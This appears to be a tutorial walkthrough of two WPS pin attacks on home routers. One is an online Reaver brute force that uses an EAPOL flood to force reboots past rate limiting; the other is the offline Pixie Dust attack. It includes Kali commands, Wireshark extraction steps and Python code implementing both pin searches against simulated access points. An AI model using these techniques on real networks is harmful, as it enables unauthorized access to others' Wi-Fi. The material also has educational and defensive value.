Showing 2 different methods to crack the passwords of routers by
taking advantage of WPS being enabled by default. The 1st method is an
online attack using Reaver. Reaver brute forces the first half of the
WPS pin and then the second half separately, because the access point
tells the attacker after each half whether it was correct. The entire
key space for the WPS pin can therefore be exhausted in at most 11,000
attempts (10,000 for the first four digits plus 1,000 for the next
three; the eighth digit is a checksum) instead of 10^7. Due to the
ease of the attack, router manufacturers fought it off by including
rate limiting in the firmware: after 3-5 failed pin attempts, the
router locks its WPS function. The first attack exploits the fact that
the router unlocks WPS if it is forced to reboot. When this occurs,
pin cracking can continue until the correct pin, and ultimately the
passphrase to the router, is recovered.
We will be using Kali Linux as the OS for this attack.
A wireless card capable of packet injection must be used to
perform such wireless attacks successfully. The card used here is an
Alfa Awus036NHA.
The wireless card must be put into monitor mode so we can scan for
networks that have WPS enabled. This creates the monitor interface mon0:
airmon-ng start wlan0
Using the command wash -i mon0 we tell Kali to scan for routers
in the area with WPS enabled. wash also tells us whether an access
point has locked WPS, and it lists the physical (MAC) address of the
router, the BSSID, as well as the channel it resides on. Both are
needed for the attacks that follow.
Upon launching a pin cracking attempt with Reaver, the access
point in question locks us out of WPS after a few failures. Using a
script that starts an EAPOL flood when Reaver detects rate limiting,
we can force the router to reboot with this denial-of-service attack
and let Reaver continue cracking pins. EAPOL (EAP over LAN, IEEE
802.1X) is the frame type that carries the EAP authentication
exchange, including the WPS registration messages, over Wi-Fi; the
flood consists of EAPOL frames the access point has to process.
The screenshot shows the attack defeating the rate limit and
continuing to crack pins. If the attacker receives a NACK message
after sending M4, the first half of the pin it guessed was incorrect
and it should continue with the next candidate; a NACK after M6 means
the first half was right but the second half was incorrect.
IMPORTANT TO NOTE: Using a modified version of Reaver we flood the
access point with EAPOL requests not just from 1 interface in monitor
mode but from 3. This injects even more packets into the router,
making a forced reboot and WPS unlock even more likely. MAC addresses
are also spoofed automatically to make this possible.
TRIPLE FLOOD.
WPS PIN INEVITABLY CRACKED AND WIFI PASSWORD DUMPED. No NACK
after the M4 message verified that the 1st half of the pin was correct.
It is important to note that of the remaining 4 digits only 3 need
to be brute forced, as the final 8th digit is a checksum computed over
the first 7. WPS PIN: 79550000 Password: VULNERABLE. It took around 4
hours. It states 3 seconds because the original screenshot was lost
and I already had the pin from the 4 hour crack session.
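The half-by-half search described above, as an added example in Python (not code from the page and not Reaver's own code). The access point is a constructed toy, SimulatedAP, an assumption for illustration: it answers each half of the pin separately (NACK after M4 or after M6), locks WPS after a configurable number of failed exchanges, and unlocks on reboot, which is what the EAPOL flood in the text forces. Responses are modelled as strings rather than real EAP frames; the checksum rule is the standard WPS one.

```python
"""Constructed model of the WPS PIN oracle that Reaver's online attack relies on.

Added example, not code from the page or from Reaver. SimulatedAP is a toy
(an assumption for illustration), not a real access point.
"""


def wps_checksum(first7: str) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (the rule Reaver uses)."""
    accum = 0
    for i, ch in enumerate(first7):
        d = int(ch)
        accum += 3 * d if i % 2 == 0 else d
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def second_half(first4: str, s: int) -> str:
    """s-th candidate for digits 5-8: three free digits plus the checksum digit."""
    three = f"{s:03d}"
    return three + str(wps_checksum(first4 + three))


class SimulatedAP:
    """Toy access point in external-registrar mode (the role Reaver attacks)."""

    def __init__(self, pin: str, passphrase: str, lock_after: int = 3):
        assert is_valid_pin(pin)
        self.pin, self.passphrase, self.lock_after = pin, passphrase, lock_after
        self.failures, self.locked, self.reboots = 0, False, 0

    def _fail(self) -> None:
        self.failures += 1
        if self.failures >= self.lock_after:
            self.locked = True          # rate limiting kicks in (3-5 on real firmware)

    def try_pin(self, first: str, second: str):
        """One registration exchange with the guessed PIN halves."""
        if self.locked:
            return "LOCKED", None       # AP ignores us while WPS is locked
        if first != self.pin[:4]:
            self._fail()
            return "NACK_AFTER_M4", None
        if second != self.pin[4:]:
            self._fail()
            return "NACK_AFTER_M6", None
        return "M7", self.passphrase    # M7 carries the AP's credential

    def reboot(self) -> None:
        """Effect of the EAPOL flood: a restart clears the WPS lock."""
        self.failures, self.locked = 0, False
        self.reboots += 1


def crack_pin(ap: SimulatedAP):
    """Reaver-style half-by-half search. Returns (pin, passphrase, pin_guesses)."""
    guesses = 0

    def send(first: str, second: str):
        nonlocal guesses
        while True:
            resp, cred = ap.try_pin(first, second)
            if resp == "LOCKED":
                ap.reboot()             # flood, wait for the restart, retry same guess
                continue
            guesses += 1
            return resp, cred

    first = None
    for f in range(10000):              # phase 1: at most 10,000 guesses
        cand = f"{f:04d}"
        resp, cred = send(cand, second_half(cand, 0))
        if resp == "NACK_AFTER_M4":
            continue                    # first half wrong, try the next one
        if resp == "M7":
            return cand + second_half(cand, 0), cred, guesses
        first = cand                    # NACK after M6: first half confirmed
        break
    if first is None:
        return None, None, guesses
    for s in range(1, 1000):            # phase 2: at most 999 more (s == 0 already sent)
        second = second_half(first, s)
        resp, cred = send(first, second)
        if resp == "M7":
            return first + second, cred, guesses
    return None, None, guesses


if __name__ == "__main__":
    ap = SimulatedAP("79550000", "VULNERABLE")   # the pin from the page, as a demo
    print(crack_pin(ap), "reboots:", ap.reboots)
```

Against the page's pin 79550000 the search needs 7,956 guesses and, with a lock after 3 failures, 2,651 forced reboots; the worst-case pin costs 10,999 guesses, inside the 11,000 bound. On real hardware each reboot costs the flood plus the restart time, which is where hours go rather than seconds.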
Second attack: brute forcing the WPS pin offline (the Pixie Dust
attack). Broadcom eCos chips use a Pseudo Random Number Generator that
is exactly as pseudo as the name suggests: its internal state is small
and its output is predictable. This tells us that it is possible to
brute force the actual state of the Pseudo Random Number Generator and
recover the "random" values the router produced from it.
The following is known to all WPS enabled devices: the
Diffie-Hellman group used to make the public keys, where g is the
generator, A and B are the private numbers of the Enrollee and
Registrar respectively, and p is a fixed 1536-bit prime. Each side
sends its public key (g^A mod p for the Enrollee, g^B mod p for the
Registrar) and both derive the shared secret g^AB mod p.
We first need 3 components that the router and Reaver exchange, and
that Wireshark can capture during the registration. Please note the
roles in this attack: the access point is the Enrollee, and Reaver
plays an external Registrar, the party that would hand the access point
its configuration once the pin has been proven. The pin is what both
sides prove knowledge of. These values are gathered from the M1 and M2
messages:
-N1: the Enrollee nonce (E-Nonce), sent in M1
-PKE: the Enrollee's public key, g^A mod p, sent in M1
-PKR: the Registrar's public key, g^B mod p, sent in M2
The 4th component needed is the AuthKey, which is generated from
the key derivation key, aka KDK. The KDK itself is derived from the
Diffie-Hellman shared secret together with both nonces and the
Enrollee's MAC address, so the Registrar side (Reaver) can compute it.
The final components needed to brute force the pin offline are
the two hashes sent in the M3 message:
-E-Hash1 = HMAC_AuthKey(E-S1 || PSK1 || PKE || PKR)
-E-Hash2 = HMAC_AuthKey(E-S2 || PSK2 || PKE || PKR)
Here HMAC is HMAC-SHA256 keyed with the AuthKey. PSK1 and PSK2 are
derived from the first half and the second half of the pin: each is
the first 128 bits of HMAC_AuthKey over the four ASCII digits of that
half. E-S1 and E-S2 are secret nonces generated by the Enrollee, so we
also need them. Once we have them we can compute the hashes for each
candidate pin and see if they match the hashes sent in the M3 message.
All we do is run through the 11,000 combinations offline: four pin
digits give 10,000 combinations for the first half, and three digits
(the eighth is the checksum) give one thousand for the second half.
That is done within seconds, if not in less than a second. If you plug
in the components we already know, you can see how easy it is to just
rip through different pins till the hashes match the originals.
The original point, though, was to figure out how to get E-S1 and
E-S2. Let us start with the worst. Ralink chipsets don't even generate
an E-S1 and E-S2; they are set to zero, so there is literally nothing
to brute force in that respect. Grabbing the public keys, the AuthKey
and the M3 hashes reveals the pin, and ultimately the password, of any
router with this vulnerable chipset. Broadcom keeps its E-S1 and E-S2
secret, but they come from the weak PRNG described above, so brute
forcing the state of the PRNG reveals them. Realtek chipsets seed
their generator from the current time, so if the exchange completes in
under one second the Enrollee nonce is equal to E-S1 and E-S2. We will
be taking advantage of a Belkin N450 with a Realtek chipset. Once the
information needed is extracted, it will be fed into the WPS Pixie
program and brute forced to reveal the pin of the router. That pin
will then be fed back into Reaver so we can obtain the actual Wi-Fi
password.
The vulnerable router: Belkin N450
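The offline check described above, as an added example in Python (not the page's own code and not pixiewps): it computes PSK1/PSK2 and E-Hash1/E-Hash2 exactly as in the formulas above and searches the 10,000 + 1,000 candidate halves under the two cheap hypotheses for E-S1/E-S2, zero (Ralink) and equal to the Enrollee nonce (Realtek). The AuthKey, PKE, PKR and E-Nonce below are constructed stand-ins for what Reaver and Wireshark dump, and enrollee_m3 is a constructed access point, not a real capture. The Broadcom PRNG state search is not implemented, so a router that keeps its secrets comes back as not recovered.

```python
"""Pixie Dust style offline WPS pin recovery. Added example, not pixiewps code.

AUTHKEY, PKE, PKR and E_NONCE are constructed values standing in for the ones
Reaver and Wireshark dump; a real AuthKey comes out of the DH exchange.
"""
import hashlib
import hmac
import os


def hmac_sha256(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII half of the pin)."""
    return hmac_sha256(authkey, pin_half.encode())[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-HashN = HMAC_AuthKey(E-SN || PSKN || PKE || PKR), as carried in M3."""
    return hmac_sha256(authkey, e_s + psk + pke + pkr)


def wps_checksum(first7: str) -> int:
    """Checksum digit over the first seven pin digits."""
    accum = sum(3 * int(c) if i % 2 == 0 else int(c) for i, c in enumerate(first7))
    return (10 - accum % 10) % 10


def enrollee_m3(authkey, pin, pke, pkr, e_nonce, chipset):
    """Constructed AP (the Enrollee) building its two M3 hashes from its pin."""
    if chipset == "ralink":
        es1 = es2 = bytes(16)                 # secrets never generated, all zero
    elif chipset == "realtek":
        es1 = es2 = e_nonce                   # same time seed as the E-Nonce
    else:                                     # broadcom-like: genuinely secret here
        es1, es2 = os.urandom(16), os.urandom(16)
    psk1, psk2 = psk_half(authkey, pin[:4]), psk_half(authkey, pin[4:])
    return e_hash(authkey, es1, psk1, pke, pkr), e_hash(authkey, es2, psk2, pke, pkr)


def find_half(authkey, e_s, pke, pkr, target, candidates):
    """Return the pin half whose hash reproduces `target`, or None."""
    for half in candidates:
        if e_hash(authkey, e_s, psk_half(authkey, half), pke, pkr) == target:
            return half
    return None


def pixie_recover_pin(authkey, e_nonce, pke, pkr, ehash1, ehash2):
    """Try E-S = 0 (Ralink) and E-S = E-Nonce (Realtek) against the M3 hashes.
    Returns the eight-digit pin, or None if neither hypothesis matches."""
    for e_s in (bytes(16), e_nonce):
        first = find_half(authkey, e_s, pke, pkr, ehash1,
                          (f"{f:04d}" for f in range(10000)))      # 10,000 candidates
        if first is None:
            continue
        seconds = (f"{s:03d}" + str(wps_checksum(first + f"{s:03d}"))
                   for s in range(1000))                           # 1,000 candidates
        second = find_half(authkey, e_s, pke, pkr, ehash2, seconds)
        if second is not None:
            return first + second
    return None


# Constructed stand-ins for the dumped values (not real captures).
AUTHKEY = hashlib.sha256(b"constructed AuthKey").digest()           # 32 bytes
PKE = hashlib.sha256(b"constructed PKE").digest() * 6                # 192 bytes, DH-sized
PKR = hashlib.sha256(b"constructed PKR").digest() * 6
E_NONCE = hashlib.sha256(b"constructed E-Nonce").digest()[:16]      # 16 bytes


def demo(chipset: str, pin: str = "21407420"):
    """Build M3 for a toy AP of the given chipset, then recover its pin offline."""
    h1, h2 = enrollee_m3(AUTHKEY, pin, PKE, PKR, E_NONCE, chipset)
    return pixie_recover_pin(AUTHKEY, E_NONCE, PKE, PKR, h1, h2)


if __name__ == "__main__":
    for chip in ("ralink", "realtek", "broadcom"):
        print(chip, demo(chip))
```

The search costs about 2 x 11,000 HMAC computations per hypothesis and finishes well under a second, which is the "less than a second" the page reports. A real tool adds the third hypothesis, E-S1/E-S2 reproduced from a brute forced PRNG state, in the same loop.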
We will fire up a modified Reaver attack on the router.
Remember, we need the information from the M1, M2, and M3 messages.
We will also fire up Wireshark to sniff packets on the mon0
interface. The modified version of Reaver we use dumps the AuthKey,
the enrollee nonce, the enrollee public key, and the two hashes. We
will also need the registrar public key, which appears in both hash
computations; only Wireshark gives us that, as this build of Reaver
does not print it. The only thing to remember during this process is
that, when looking for the packet containing the registrar key, the
enrollee nonce must match, or else the wrong keys will be fed into
the WPS Pixie program. Reaver options used:
-i interface (mon0)
-b router's physical address (BSSID)
-c channel
-vv verbose mode
As seen in this screenshot, the M1, M2, and M3 messages are
exchanged successfully, allowing us to stop the attack after only
one pin attempt. The modified version of Reaver has dumped the
AuthKey, E-Nonce, enrollee public key, and hashes as promised.
Wireshark has captured the M1 and M2 messages as promised, so we can
extract the registrar key. The enrollee nonce and enrollee public key
can also be viewed in Wireshark if needed.
Open up a text editor and paste in the AuthKey, the enrollee
nonce, the enrollee public key, and the hashes. Then go to Wireshark
and hit Ctrl + F. This opens the find packet bar. We will be
searching the M2 message for the registrar public key, as it is the
final piece of the puzzle: select String and Packet details, and type
"public key". This looks through the M2 message for the registrar
key. If the screenshot is examined closely, it can be seen that I
have already found and highlighted the enrollee nonce and it matches
the nonce printed by Reaver. This verifies that the right packet is
being used and not one from a different pin transaction.
Registrar public key located and loaded into the text editor. The
info is ready to be moved into the brute force tool.
WPS Pixie: with the proper information plugged in, the WPS pin is
resolved in less than a second. PSK1 (the first half of the pin) and
PSK2 (the second half of the pin) are enumerated. Pin: 21407420
The last step is to plug the pin into Reaver. It will resolve
the passphrase to the Wi-Fi without fear of rate limiting. It should
take no longer than 5 seconds, as the brunt of the attack took place
offline.
First, we add the pin to the original Reaver command line with
--pin=21407420.
Password cracked: PWNEDROUTER